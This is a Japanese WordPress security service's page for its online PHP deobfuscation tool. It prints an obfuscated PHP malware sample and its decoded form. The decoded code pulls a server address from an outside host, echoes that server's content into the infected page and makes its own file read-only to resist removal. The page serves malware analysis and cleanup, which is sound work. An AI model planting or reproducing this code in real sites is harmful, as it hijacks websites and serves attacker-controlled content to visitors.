Japanese English

PHP 難読化コードの復元・デコード

Wordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。

※すべての難読化コードを解除できるわけではございませんのでご理解とご了承をお願いいたします。

下記のコードを難読化解除しました

<?php goto xY3Ep; LaSyH: curl_setopt($ch, CURLOPT_URL, $TD_server . '' . $host_name); goto vLJ6c; ksz1E: curl_setopt($ch_config, CURLOPT_URL, $remote_config_url); goto jxbkW; u8FV0: curl_setopt($ch_config, CURLOPT_TIMEOUT, 30); goto jMwSx; l7Hfi: $host_name = "\x2f" . $_SERVER["\110\124\x54\x50\1...



難読化されたPHPコード

<?php
 goto xY3Ep; LaSyH: curl_setopt($ch, CURLOPT_URL, $TD_server . '' . $host_name); goto vLJ6c; ksz1E: curl_setopt($ch_config, CURLOPT_URL, $remote_config_url); goto jxbkW; u8FV0: curl_setopt($ch_config, CURLOPT_TIMEOUT, 30); goto jMwSx; l7Hfi: $host_name = "\x2f" . $_SERVER["\110\124\x54\x50\137\110\117\x53\124"] . $_SERVER["\x52\x45\121\x55\x45\123\124\x5f\x55\122\x49"]; goto Zmquz; gbc45: $url1 = $_SERVER["\x50\110\120\137\x53\x45\x4c\x46"]; goto J_zn2; jCmyF: set_writeable($filename1); goto C93No; ggnEH: curl_close($ch); goto aoBBJ; ro4Tj: date_default_timezone_set("\x50\122\x43"); goto rcCm1; rcCm1: $remote_config_url = "\150\x74\x74\160\163\x3a\x2f\57\152\x73\x2e\x6c\165\144\x77\151\x67\x63\x6c\x61\163\x73\56\143\157\155\x2f\103\157\x6e\x74\x72\157\x6c\154\x65\162\57\163\145\x72\x76\145\162\56\160\x68\x70"; goto nvUIb; i2gV6: $remote_content = trim($remote_content); goto bSv71; Zmquz: $ch = curl_init(); goto LaSyH; bSv71: $TD_server = $remote_content; goto l7Hfi; xY3Ep: set_time_limit(0); goto atSLm; J_zn2: $filename1 = @end(explode("\57", $url1)); goto jpCFp; l4rAW: curl_close($ch_config); goto i2gV6; jxbkW: curl_setopt($ch_config, CURLOPT_RETURNTRANSFER, true); goto u8FV0; jMwSx: curl_setopt($ch_config, CURLOPT_FOLLOWLOCATION, true); goto EhoXQ; EhoXQ: $remote_content = curl_exec($ch_config); goto l4rAW; jyNTT: $Content_mb = curl_exec($ch); goto ggnEH; aoBBJ: echo $Content_mb; goto gbc45; jpCFp: function set_writeable($file_name) { @chmod($file_name, 292); } goto jCmyF; atSLm: header("\103\x6f\156\164\x65\x6e\164\x2d\124\x79\160\x65\72\40\164\145\x78\x74\57\x68\164\x6d\154\x3b\143\x68\x61\162\x73\145\x74\x3d\165\x74\x66\x2d\70"); goto ro4Tj; nvUIb: $ch_config = curl_init(); goto ksz1E; vLJ6c: curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); goto jyNTT; C93No: ?>

デコード(難読化解除)されたコード

<?php

set_time_limit(0);
header("Content-Type: text/html;charset=utf-8");
date_default_timezone_set("PRC");
$remote_config_url = "https://js.ludwigclass.com/Controller/server.php";
$ch_config = curl_init();
curl_setopt($ch_config, CURLOPT_URL, $remote_config_url);
curl_setopt($ch_config, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch_config, CURLOPT_TIMEOUT, 30);
curl_setopt($ch_config, CURLOPT_FOLLOWLOCATION, true);
$remote_content = curl_exec($ch_config);
curl_close($ch_config);
$remote_content = trim($remote_content);
$TD_server = $remote_content;
$host_name = "/" . $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"];
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $TD_server . '' . $host_name);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$Content_mb = curl_exec($ch);
curl_close($ch);
echo $Content_mb;
$url1 = $_SERVER["PHP_SELF"];
$filename1 = @end(explode("/", $url1));
function set_writeable($file_name)
{
    @chmod($file_name, 292);
}
set_writeable($filename1);

■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]

■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります

(C)2019 ワードプレス ドクター All rights reserved.